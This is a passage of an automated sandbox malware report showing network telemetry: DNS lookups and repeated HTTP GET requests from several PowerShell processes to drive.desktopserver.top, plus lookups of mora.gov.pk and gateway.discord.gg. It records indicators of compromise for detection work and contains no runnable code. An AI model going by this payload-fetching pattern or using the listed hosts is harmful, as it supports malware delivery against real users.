                                                                                                                                          Sep 30, 2024 18:58:12.307133913 CEST53500921.1.1.1192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:12.307215929 CEST53645101.1.1.1192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:12.307250023 CEST53506871.1.1.1192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:12.449975014 CEST53584161.1.1.1192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:12.450484037 CEST53527771.1.1.1192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:13.409904003 CEST53630951.1.1.1192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:16.163785934 CEST6031553192.168.2.51.1.1.1
                                                                                                                                          Sep 30, 2024 18:58:16.164119005 CEST5539753192.168.2.51.1.1.1
                                                                                                                                          Sep 30, 2024 18:58:16.231302023 CEST5086853192.168.2.51.1.1.1
                                                                                                                                          Sep 30, 2024 18:58:16.231482983 CEST6488153192.168.2.51.1.1.1
                                                                                                                                          Sep 30, 2024 18:58:16.238575935 CEST53508681.1.1.1192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:16.238943100 CEST53648811.1.1.1192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:16.334031105 CEST53553971.1.1.1192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:16.467133999 CEST53603151.1.1.1192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:22.655375957 CEST4988353192.168.2.51.1.1.1
                                                                                                                                          Sep 30, 2024 18:58:22.662159920 CEST53498831.1.1.1192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:30.993557930 CEST53628131.1.1.1192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:49.948997021 CEST53653741.1.1.1192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:11.497373104 CEST53582391.1.1.1192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:12.911567926 CEST53509231.1.1.1192.168.2.5
                                                                                                                                          Sep 30, 2024 18:59:40.198076963 CEST53511961.1.1.1192.168.2.5

                                                                                                                                          ICMP Packets

                                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                                          Sep 30, 2024 18:58:12.307296038 CEST192.168.2.51.1.1.1c20e(Port unreachable)Destination Unreachable

                                                                                                                                          DNS Queries

                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Sep 30, 2024 18:58:10.983424902 CEST192.168.2.51.1.1.10xeebdStandard query (0)drive.desktopserver.topA (IP address)IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:11.925549030 CEST192.168.2.51.1.1.10xc486Standard query (0)mora.gov.pkA (IP address)IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:11.925992966 CEST192.168.2.51.1.1.10x7731Standard query (0)mora.gov.pk65IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:11.992819071 CEST192.168.2.51.1.1.10xeebdStandard query (0)drive.desktopserver.topA (IP address)IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:16.163785934 CEST192.168.2.51.1.1.10x840aStandard query (0)mora.gov.pkA (IP address)IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:16.164119005 CEST192.168.2.51.1.1.10x3129Standard query (0)mora.gov.pk65IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:16.231302023 CEST192.168.2.51.1.1.10x43b9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:16.231482983 CEST192.168.2.51.1.1.10x556Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:22.655375957 CEST192.168.2.51.1.1.10x7a7cStandard query (0)gateway.discord.ggA (IP address)IN (0x0001)false

                                                                                                                                          DNS Answers

                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Sep 30, 2024 18:58:12.300019979 CEST1.1.1.1192.168.2.50xeebdNo error (0)drive.desktopserver.top104.21.92.189A (IP address)IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:12.300019979 CEST1.1.1.1192.168.2.50xeebdNo error (0)drive.desktopserver.top172.67.197.32A (IP address)IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:12.307215929 CEST1.1.1.1192.168.2.50xeebdNo error (0)drive.desktopserver.top104.21.92.189A (IP address)IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:12.307215929 CEST1.1.1.1192.168.2.50xeebdNo error (0)drive.desktopserver.top172.67.197.32A (IP address)IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:12.450484037 CEST1.1.1.1192.168.2.50xc486No error (0)mora.gov.pk203.101.184.86A (IP address)IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:16.238575935 CEST1.1.1.1192.168.2.50x43b9No error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:16.238943100 CEST1.1.1.1192.168.2.50x556No error (0)www.google.com65IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:16.467133999 CEST1.1.1.1192.168.2.50x840aNo error (0)mora.gov.pk203.101.184.86A (IP address)IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:22.662159920 CEST1.1.1.1192.168.2.50x7a7cNo error (0)gateway.discord.gg162.159.135.234A (IP address)IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:22.662159920 CEST1.1.1.1192.168.2.50x7a7cNo error (0)gateway.discord.gg162.159.133.234A (IP address)IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:22.662159920 CEST1.1.1.1192.168.2.50x7a7cNo error (0)gateway.discord.gg162.159.130.234A (IP address)IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:22.662159920 CEST1.1.1.1192.168.2.50x7a7cNo error (0)gateway.discord.gg162.159.134.234A (IP address)IN (0x0001)false
                                                                                                                                          Sep 30, 2024 18:58:22.662159920 CEST1.1.1.1192.168.2.50x7a7cNo error (0)gateway.discord.gg162.159.136.234A (IP address)IN (0x0001)false

                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                          • login.live.com
                                                                                                                                          • drive.desktopserver.top
                                                                                                                                          • mora.gov.pk
                                                                                                                                          • gateway.discord.gg
                                                                                                                                          • slscr.update.microsoft.com

                                                                                                                                          HTTP Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.549725104.21.92.189807304C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Sep 30, 2024 18:58:12.712457895 CEST173OUTGET /file/ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                          Host: drive.desktopserver.top
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Sep 30, 2024 18:58:12.903218031 CEST860INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:12 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 167
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: max-age=3600
                                                                                                                                          Expires: Mon, 30 Sep 2024 17:58:12 GMT
                                                                                                                                          Location: https://drive.desktopserver.top/file/
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xitzcJpbCZGqkAIV8gqncAD2ZAdL%2BqIj2oudbGN240kg0E6quabWKCj8YMhwFe8YSPsV47iEdUi1dh7BmxbZ1HlGjlgg1laJuN%2BM156Riyk2ORfQzn8BTJ6%2Fx3pTMCFlJljCEHfZw%2BiR7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c1a64bee4310-EWR
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.549741104.21.92.189808288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Sep 30, 2024 18:58:18.925689936 CEST177OUTGET /file/res/ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                          Host: drive.desktopserver.top
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Sep 30, 2024 18:58:19.426460028 CEST860INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:19 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 167
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: max-age=3600
                                                                                                                                          Expires: Mon, 30 Sep 2024 17:58:19 GMT
                                                                                                                                          Location: https://drive.desktopserver.top/file/res/
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1sVY4GACmvwRCkRzu7JGloxud0X6KHfU1ohsI6b4VTQwBGK6oGUcqwgKt4R3Q%2B4aqJeF0ozlSnBT6k05WMjgOBtP4oMJBIF2g%2F8ZJTxZH0TReMRJ7WKa7zmCcb7IVp6VMnMSNO0ur9QleQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c1ceeb917cb1-EWR
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                          Sep 30, 2024 18:58:19.724448919 CEST860INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:19 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 167
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: max-age=3600
                                                                                                                                          Expires: Mon, 30 Sep 2024 17:58:19 GMT
                                                                                                                                          Location: https://drive.desktopserver.top/file/res/
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1sVY4GACmvwRCkRzu7JGloxud0X6KHfU1ohsI6b4VTQwBGK6oGUcqwgKt4R3Q%2B4aqJeF0ozlSnBT6k05WMjgOBtP4oMJBIF2g%2F8ZJTxZH0TReMRJ7WKa7zmCcb7IVp6VMnMSNO0ur9QleQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c1ceeb917cb1-EWR
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.549745104.21.92.189809160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Sep 30, 2024 18:58:24.391103983 CEST173OUTGET /file/ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                          Host: drive.desktopserver.top
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Sep 30, 2024 18:58:25.070769072 CEST858INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:24 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 167
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: max-age=3600
                                                                                                                                          Expires: Mon, 30 Sep 2024 17:58:24 GMT
                                                                                                                                          Location: https://drive.desktopserver.top/file/
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d24y%2B0dtd5hPnDsy85kYB7etBuC%2Bu9ynU87a7TdSESqk5XixUpEs94EwNUSvpaSmUEp9NAMG8VWAJIf2C3VqHfzIrN56o1AqtnVgJbK2Y%2Bo82sDw29ZHfYRp39Je8Rer9zdmM3GM47IujA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c1f12c500f3f-EWR
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                          Sep 30, 2024 18:58:25.092430115 CEST858INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:24 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 167
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: max-age=3600
                                                                                                                                          Expires: Mon, 30 Sep 2024 17:58:24 GMT
                                                                                                                                          Location: https://drive.desktopserver.top/file/
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d24y%2B0dtd5hPnDsy85kYB7etBuC%2Bu9ynU87a7TdSESqk5XixUpEs94EwNUSvpaSmUEp9NAMG8VWAJIf2C3VqHfzIrN56o1AqtnVgJbK2Y%2Bo82sDw29ZHfYRp39Je8Rer9zdmM3GM47IujA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c1f12c500f3f-EWR
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.549746104.21.92.189809208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Sep 30, 2024 18:58:24.398926020 CEST173OUTGET /file/ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                          Host: drive.desktopserver.top
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Sep 30, 2024 18:58:25.070902109 CEST862INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:24 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 167
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: max-age=3600
                                                                                                                                          Expires: Mon, 30 Sep 2024 17:58:24 GMT
                                                                                                                                          Location: https://drive.desktopserver.top/file/
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FDrCwqrw%2FoiVrDxuNN5UZcDggyFpjJOSap%2BJ6FpPzLPgDaglUsRR6t5Ux8on8QXzMkdSNhJKsbhZ%2FQ%2FczzTFkBFWbkg9%2Bhjc1QZCAwtsXz9NwJrPC4ZHNQ7gWSJMknGUT4BtmWKaaxBZBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c1f1283b43ad-EWR
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                          Sep 30, 2024 18:58:25.100351095 CEST862INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:24 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 167
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: max-age=3600
                                                                                                                                          Expires: Mon, 30 Sep 2024 17:58:24 GMT
                                                                                                                                          Location: https://drive.desktopserver.top/file/
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FDrCwqrw%2FoiVrDxuNN5UZcDggyFpjJOSap%2BJ6FpPzLPgDaglUsRR6t5Ux8on8QXzMkdSNhJKsbhZ%2FQ%2FczzTFkBFWbkg9%2Bhjc1QZCAwtsXz9NwJrPC4ZHNQ7gWSJMknGUT4BtmWKaaxBZBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c1f1283b43ad-EWR
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.549747104.21.92.189809180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Sep 30, 2024 18:58:24.473486900 CEST173OUTGET /file/ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                          Host: drive.desktopserver.top
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Sep 30, 2024 18:58:25.072390079 CEST862INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:24 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 167
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: max-age=3600
                                                                                                                                          Expires: Mon, 30 Sep 2024 17:58:24 GMT
                                                                                                                                          Location: https://drive.desktopserver.top/file/
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HQOyWubLf4g%2B9VP%2BM6L41h7OHSRCh%2B%2FVH9lE3VEAmPX295uqekNT1m99KyWBE3Tns2LyfdjTooYfD1ktWkaXhMiYsAkxQ1juNLcYOQOhDQkdmZVAYa%2BeuHNihhivSQT6PktkkqEDrPoSig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c1f1bc7a0f55-EWR
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                          Sep 30, 2024 18:58:25.188452005 CEST862INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:24 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 167
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: max-age=3600
                                                                                                                                          Expires: Mon, 30 Sep 2024 17:58:24 GMT
                                                                                                                                          Location: https://drive.desktopserver.top/file/
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HQOyWubLf4g%2B9VP%2BM6L41h7OHSRCh%2B%2FVH9lE3VEAmPX295uqekNT1m99KyWBE3Tns2LyfdjTooYfD1ktWkaXhMiYsAkxQ1juNLcYOQOhDQkdmZVAYa%2BeuHNihhivSQT6PktkkqEDrPoSig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c1f1bc7a0f55-EWR
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.549754104.21.92.189809196C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Sep 30, 2024 18:58:34.980166912 CEST177OUTGET /file/res/ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                          Host: drive.desktopserver.top
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Sep 30, 2024 18:58:35.507978916 CEST866INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:35 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 167
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Cache-Control: max-age=3600
                                                                                                                                          Expires: Mon, 30 Sep 2024 17:58:35 GMT
